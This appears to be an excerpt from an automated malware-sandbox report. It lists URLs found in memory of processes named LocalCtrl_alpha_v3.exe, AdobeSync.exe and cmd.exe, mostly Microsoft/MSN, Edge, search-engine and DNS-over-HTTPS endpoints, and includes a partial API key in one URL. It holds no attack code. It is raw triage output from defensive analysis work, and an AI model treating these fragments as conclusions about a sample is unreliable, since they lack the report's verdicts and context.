Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=040C031D
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/channel-data-connector.b857251407e592f709ce.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/codex-bing-chat.004373b4b46f289247a2.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common-settings-edgenext.2aca53164d1cd4b72160.
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.13d268863c97be5f5fe9.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.13d268863c97be5f5fe9.js5.47
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.13d268863c97be5f5fe9.jsf300f31.js160.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/cs-core-desktop_card-components_dist_card-bann
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.e47fb6bc3b6a0e3bd8a6.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.e47fb6bc3b6a0e3bd8a6.js31.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.js47
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.js47X8.
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_feedback-service_dist_FeedbackAuth_js-web
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2032787209.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_topics-shared-state_dist_TopicData_connec
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js7
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.jsX8
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/money-info-service.ed830cd8bd50d3a81f7d.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/money-info-service.ed830cd8bd50d3a81f7d.jsom
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/money-quote-vertical-watchlist.7e740a00da51bb7
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v3v4.b1951ea80e3b80cfa882.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_j
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-banner.cef8d219ef568729016b.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-banner.cef8d219ef568729016b.js.0.204
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-placement-manager.a83c7cffbebd84e079
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.d639c3da7a2212403887.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.d639c3da7a2212403887.jsdd1.jsX8/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/scrollPerfMetricTrackers.0c056f3a2106f33fad55.
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-control-wc.367cab6cb9bb41af1876.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/sports-info-utils.29760dcceee65375ee3c.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.10b612b41321c229bd80.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.10b612b41321c229bd80.jss
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.334afafb1912a9f141aa.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.334afafb1912a9f141aa.js1fd03.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.e29eca8a01b21f77224b.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.e29eca8a01b21f77224b.jsX8/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.e29eca8a01b21f77224b.jsfd03.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.b4742062efdd1e38bfac.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.b4742062efdd1e38bfac.jsonseBody=true
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.5e95a6e8b96055fbd144.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.5e95a6e8b96055fbd144.js47&lang=en-GB
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/weather-card-data-connector.ceb5cbb929735825cc
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/welcomeGreetingLight.d9ab3d372321b5935217.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/widgets-region.c1e1084e1dda349af13e.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/widgets-region.c1e1084e1dda349af13e.js17.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/service/news/feed/pages/weblayout?User=m-040C031DFB13691C1F601670FA61685C&act
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1980037435.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/service/segments/recoitems/weather?apikey=UhJ4G66OjyLbn9mXARgajXLiLw6V75sHnfp
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svg2045.47
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/common/icons/copilot_color.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2032787209.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/FeedSettings.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/LessFeed.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/LessFeedDark.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Calendar_24x.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.json
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2033853901.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/PartlyCloudy
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://azureedge.net
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007F16000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F16000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1980037435.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2108273562.0000000007F07000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034339884.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bingretailmsndata.azureedge.net/msndata/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2005803456.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2047012487.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007F73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cleanbrowsing.org/privacy
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1978505959.0000000007F13000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2033853901.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.googleusercontent.com
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/Char
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net/?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR30r4c&FrontEnd=AF
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1978505959.0000000007F13000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2033853901.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=tt.jscc
